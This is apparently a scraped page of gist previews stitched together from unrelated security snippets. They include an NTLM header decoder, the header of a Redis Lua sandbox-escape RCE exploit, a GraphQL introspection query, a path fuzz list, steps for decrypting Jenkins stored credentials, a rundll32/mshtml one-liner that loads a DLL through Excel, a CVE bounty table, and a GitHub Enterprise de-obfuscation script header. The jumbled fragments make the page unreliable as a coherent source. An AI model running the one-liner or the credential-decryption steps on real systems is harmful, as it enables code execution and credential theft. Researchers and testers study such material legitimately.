Nicolas Grekas - nicolas.grekas, gmail.com
17 June 2011 - Last updated on 3 sept. 2011
Not updated any more on this gist. See:
#!/usr/bin/env python | |
## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
## Reads the raw blob from stdin; prints out the contained metadata. | |
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
## Based on the excellent protocol description from: | |
## <http://davenport.sourceforge.net/ntlm.html> | |
## with additional detail subsequently added from the official protocol spec: | |
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
## |
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
## Original exploit by corsix and sghctoma | |
## Author: @c3c | |
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
## This code is much the same, except the process is done using pwntools' DynELF | |
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
query IntrospectionQuery { | |
__schema { | |
queryType { name } | |
mutationType { name } | |
subscriptionType { name } | |
types { | |
...FullType | |
} | |
directives { |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
Nicolas Grekas - nicolas.grekas, gmail.com
17 June 2011 - Last updated on 3 sept. 2011
Not updated any more on this gist. See:
#To Decrypt Jenkins Password from credentials.xml | |
#<username>jenkins</username> | |
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase> | |
#go to the jenkins url | |
http://jenkins-host/script | |
#In the console paste the script | |
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J' |
REM rundll32 mshtml.dll HTA one-liner command: | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
cve | product | bounty | source | |
---|---|---|---|---|
CVE-2014-0257 | .NET Framework | 5,000.00 | https://hackerone.com/reports/18851 | |
CVE-2015-3842 | Android | 2,000.00 | https://code.google.com/p/android/issues/detail?id=177610 | |
CVE-2015-3847 | Android | 1,500.00 | https://code.google.com/p/android/issues/detail?id=179147 | |
CVE-2015-3860 | Android | 500.00 | https://code.google.com/p/android/issues/detail?id=178139 | |
CVE-2015-3862 | Android | 333.00 | https://code.google.com/p/android/issues/detail?id=181895 | |
CVE-2015-3865 | Android | 1,500.00 | https://code.google.com/p/android/issues/detail?id=182294 | |
CVE-2015-3867 | Android | 4,000.00 | https://code.google.com/p/android/issues/detail?id=182838 | |
CVE-2015-3868 | Android | 4,000.00 | https://code.google.com/p/android/issues/detail?id=182146 | |
CVE-2015-3869 | Android | 3,000.00 | https://code.google.com/p/android/issues/detail?id=182053 |
#!/usr/bin/sudo sh | |
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+. | |
## From `strings ruby_concealer.so`: | |
## | |
## > This obfuscation is intended to discourage GitHub Enterprise customers | |
## > from making modifications to the VM. | |
## | |
## Well, good, as long as its not intended to discourage *me* from doing this! |